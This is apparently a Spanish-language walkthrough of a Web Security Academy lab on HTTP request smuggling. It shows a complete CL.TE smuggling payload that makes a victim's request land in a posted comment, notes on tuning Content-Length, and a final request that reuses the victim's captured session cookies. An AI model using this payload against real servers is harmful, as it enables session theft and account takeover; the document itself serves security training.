09 - Exploiting HTTP request smuggling to capture other users' requests

La cosa para capturar la petición que esta haciendo la otra persona es usar un storage .
En este caso los comentarios, lo podemos hacer de esta forma :

POST / HTTP/1.1\r\n
Host: 0a90006604a292fb80a849b8001600c4.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 253\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /post/comment HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Cookie: session=OhENlPprnm4KZgeSTIG3VBttF3g9SPJP\r\n
Content-Length: 400\r\n
\r\n
csrf=HOiBASB63pIsEwjRmRKTyZpM8TT8dxRa&postId=10&website=&name=test&email=test%40test.com&comment=

Proporcionándole la cookie de sesión y el csrf token para que la víctima haga un comentario con su request en el post que quieras

Sería ir ajustando el length hasta que se muestre la cookie de la petición que ha hecho el usuario en un comentario.

Cada dos request que hacemos, el usuario hace 1.

A mi me funcionó con Content-Length: 920

Para resolver el lab hacemos :

GET /my-account HTTP/2
Host: 0a90006604a292fb80a849b8001600c4.web-security-academy.net
Cookie: victim-fingerprint=26OjlfvGR6yqvB1SslJVK6ufq3RZhJFF; secret=k7GM3qDD8hSDagRy1kng2zbcY1g5AvAn; session=jLu6nJIjBDPtj3DzUqWpO8rRDM6NAsMJ